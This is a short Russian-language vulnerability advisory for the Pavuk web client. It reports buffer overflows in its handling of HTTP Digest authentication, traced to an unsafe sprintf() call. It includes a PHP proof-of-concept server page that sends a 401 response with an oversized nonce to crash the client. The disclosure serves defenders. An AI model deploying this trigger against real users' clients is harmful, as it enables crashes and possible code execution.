Программа: Pavuk
Несколько переполнений буфера обнаружено в Pavuk в обработке ответов Digest аутентификации. Удаленный пользователь может выполнить произвольный код на целевой системе.
Удаленный пользователь может послать специально обработанное HTTP 401 сообщение, которое включает Digest ответ с чрезмерно длинными значениями в некоторых полях, чтобы вызвать переполнение буфера. Уязвимость связана с небезопасным вызовом функции sprintf().
Пример:
<?php
$buffer = "";
for ($i = 0; $i < 1024; $i++) {
$buffer .= "A";
}
header("WWW-Authenticate: Digest realm=\"Secured by Digest Auth\"
opaque=\"opaque\" nonce=\"$buffer\"");
header("Status: 401 Not Authorized");
?>